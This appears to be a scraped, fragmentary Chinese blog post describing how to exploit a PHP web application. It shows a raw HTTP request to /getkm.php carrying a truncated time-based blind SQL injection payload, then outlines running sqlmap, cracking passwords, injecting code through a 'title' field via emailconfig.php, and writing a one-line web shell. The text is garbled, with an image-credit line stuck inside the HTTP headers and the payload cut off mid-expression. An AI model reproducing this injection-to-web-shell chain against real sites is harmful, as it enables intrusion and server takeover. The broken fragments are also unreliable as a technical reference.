文章目录
[+]
POST /getkm.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
(图片来自网络侵删)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 57
Cookie: PHPSESSID=cidvriorg2as3nbgc575f6mhdr
Connection: close
Upgrade-Insecure-Requests: 1
tqm=11' AND (SELECT FROM (SELECT(SLEEP(5)
布局一波,看看相应码
丢sqlmap里面
接下来便是常规跑密码,我就不说了。
getshell我们去跟进一下set.php文件
包含emailconfig.php,连续跟进
创造title处可以布局一下phpinfo
成功实行
这里就可以直接写shell了,布局个一句话
也希望用这套源码的朋友,多多把稳下!
制作不易,点个赞再走吧!
#网络安全在我身边#
